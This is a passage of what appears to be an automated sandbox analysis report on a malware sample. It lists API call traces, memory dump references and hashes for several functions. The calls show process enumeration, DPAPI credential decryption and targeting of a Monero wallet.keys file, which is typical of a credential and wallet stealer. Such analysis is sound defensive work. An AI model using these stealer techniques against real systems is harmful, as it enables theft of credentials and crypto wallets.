                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 9092791a836d5e6b2ef7c21d7fd745db7b4524b2631538ae978882743c74bed3
                          • Instruction ID: 6bec792f12ceb522f460546b3e1bf305d4b164cbff9b08ecf6f2f51edfeabcdb
                          • Opcode Fuzzy Hash: 9092791a836d5e6b2ef7c21d7fd745db7b4524b2631538ae978882743c74bed3
                          • Instruction Fuzzy Hash: F6010CB5A00308ABCB14DFA5CD88BEDBBF8EB48700F1081D8A945E6390DB359B40CF61
                          Function 00B08680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00B105B7), ref: 00B086CA
                          • Process32First.KERNEL32(?,00000128), ref: 00B086DE
                          • Process32Next.KERNEL32(?,00000128), ref: 00B086F3
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • CloseHandle.KERNEL32(?), ref: 00B08761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 321b59a435fa62f88479efc0dfafb6b82cea04deee86074174d640ef656d16fa
                          • Instruction ID: fc0047a46ab0a7fc498f3487d1507578c0d4cb8ead109a8fc38982512e6feb4e
                          • Opcode Fuzzy Hash: 321b59a435fa62f88479efc0dfafb6b82cea04deee86074174d640ef656d16fa
                          • Instruction Fuzzy Hash: 95313C71911318ABCB24EB54CC85FEEBBB8EB55700F1085D9A10AA21E0DB706E45CFA1
                          Function 00B08EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00AF5184,40000001,00000000,00000000,?,00AF5184), ref: 00B08EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 07d0bee90185fa841f810ff953cc4089f53fc63026461fb4057d8ba345d48cd3
                          • Instruction ID: 1ab836c6a833e837722232dadb2766acb2dc800fa90f76ebc7aa94e064bb7dd0
                          • Opcode Fuzzy Hash: 07d0bee90185fa841f810ff953cc4089f53fc63026461fb4057d8ba345d48cd3
                          • Instruction Fuzzy Hash: E111DA74200205AFDB00CF64D885FAB3BE9EF89714F109998F9958B290DB75EA41DB64
                          Function 00AF9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9B2A
                          • LocalFree.KERNEL32(?,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: b238a1b8059714b7d35f183cda1423059dbaa3c12ff27ef1948db777eeac9319
                          • Instruction ID: 11ce80c2d9112ffebd2695dbdd16d144da16beeba9292bd6de387b1a332129a6
                          • Opcode Fuzzy Hash: b238a1b8059714b7d35f183cda1423059dbaa3c12ff27ef1948db777eeac9319
                          • Instruction Fuzzy Hash: 2F1163B4641308AFEB10CFA4DC95FAA77B5EB89714F208158FA159B390C775A941CB60
                          Function 00B07980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B10E00,00000000,?), ref: 00B079B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B079B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00B10E00,00000000,?), ref: 00B079C4
                          • wsprintfA.USER32 ref: 00B079F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 8def0b37e4f3ebc5807f449804beb998685059698628b1959fdb36947dfc0910
                          • Instruction ID: 7bae3e5f18cacf13fa3cb8b37769fd61e265c3897f42fb1ca8a439098e941999
                          • Opcode Fuzzy Hash: 8def0b37e4f3ebc5807f449804beb998685059698628b1959fdb36947dfc0910
                          • Instruction Fuzzy Hash: 93112AB2A04618ABCB14DFC9DD45BBEBBF8FB4CB11F10415AF645A2290D6395940C7B1
                          Function 00B07A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,018AF200,00000000,?,00B10E10,00000000,?,00000000,00000000), ref: 00B07A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B07A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,018AF200,00000000,?,00B10E10,00000000,?,00000000,00000000,?), ref: 00B07A7D
                          • wsprintfA.USER32 ref: 00B07AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 4c9638e9c86b2bee04a3fa9603f764a310f9219a2b3c9bd4e5a16940b5853c06
                          • Instruction ID: d349c6dd63eda9da0bf1f801dfbdf2b0c17e9b22fe93f248e00998292bc3ee97
                          • Opcode Fuzzy Hash: 4c9638e9c86b2bee04a3fa9603f764a310f9219a2b3c9bd4e5a16940b5853c06
                          • Instruction Fuzzy Hash: B1117CB1A45618EBEB209B58DC49FA9BBB8FB04721F1042DAE90A932D0CB741A44CB51
                          Function 00EAC92D Relevance: 5.3, Strings: 3, Instructions: 1520COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Bl?$RrN;${;
                          • API String ID: 0-279743825
                          • Opcode ID: 966422e7eef111bb95e54303ed787e323328b539dfe27a01b47643bf5638e217
                          • Instruction ID: 73b09508e4eef832a50d63ee8dd50f17dfbf2428f8ab5d2ed1c97dae3d764697
                          • Opcode Fuzzy Hash: 966422e7eef111bb95e54303ed787e323328b539dfe27a01b47643bf5638e217
                          • Instruction Fuzzy Hash: 78B2B0F390C2149FE3046F29EC8566AFBE9EF94720F16492DEAC4C3744EA7558408B97
                          Function 00B03720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(00B0E118,00000000,00000001,00B0E108,00000000), ref: 00B03758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00B037B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: b6deb2affac278be5ad6f26e274f7985b210cefc0e9be722d2369844464274b9
                          • Instruction ID: e0acaa7602fd11a2531d2cb2a66861699c7bf1b428b0103c949891a5d5f13462
                          • Opcode Fuzzy Hash: b6deb2affac278be5ad6f26e274f7985b210cefc0e9be722d2369844464274b9
                          • Instruction Fuzzy Hash: D241EC70A40A189FDB24DB58CC99B9BB7B5BB48702F4081D8E618E72D0D771AE85CF50
                          Function 00AF9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AF9B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00AF9BA3
                          • LocalFree.KERNEL32(?), ref: 00AF9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 18ed1db4e84f072b1bd0f16f562a6b2d3ec76ff93d7a09d4ea7c57e91428d63d
                          • Instruction ID: 90d5014fe1ac82f6dbea656fd2528fdc52bc67293b19a055d801d3cb9e559927
                          • Opcode Fuzzy Hash: 18ed1db4e84f072b1bd0f16f562a6b2d3ec76ff93d7a09d4ea7c57e91428d63d
                          • Instruction Fuzzy Hash: 5911B7B8A00209EFDB04DF98D985AAE77B5FF88300F104598F915A7350D770AE10CFA1
                          Function 00EB51E0 Relevance: 3.7, Strings: 2, Instructions: 1231COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: q}_$ti=^
                          • API String ID: 0-1235932989
                          • Opcode ID: b701d99083ccffd0c500442726ce9b698755f98d9671e626bbf95810d9130c98
                          • Instruction ID: 17ba3dd125ba54e1590a60ca6eaf7b3f790afa87759a604ccb5869e38c02b476
                          • Opcode Fuzzy Hash: b701d99083ccffd0c500442726ce9b698755f98d9671e626bbf95810d9130c98
                          • Instruction Fuzzy Hash: 5E8219F360C2149FE3046E2DEC8567ABBE9EF94720F16463DEAC4C3744EA3598058697
                          Function 00EAB112 Relevance: 2.6, Strings: 1, Instructions: 1387COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: E?_
                          • API String ID: 0-4261685252
                          • Opcode ID: ac02563b6c55904dc819477dc8af34752558e0faae8c6c7438662a5602f8cbbe
                          • Instruction ID: c57090381168d564de6be1bf0cb20de8e2c7786403e86d9a9e3b78f4fb9f806c
                          • Opcode Fuzzy Hash: ac02563b6c55904dc819477dc8af34752558e0faae8c6c7438662a5602f8cbbe
                          • Instruction Fuzzy Hash: CA9206F390C2009FE704AE28DC8567AB7E5EF94720F1A493DEAC5D3744E63598048797
                          Function 00EB08C0 Relevance: 2.1, Strings: 1, Instructions: 804COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
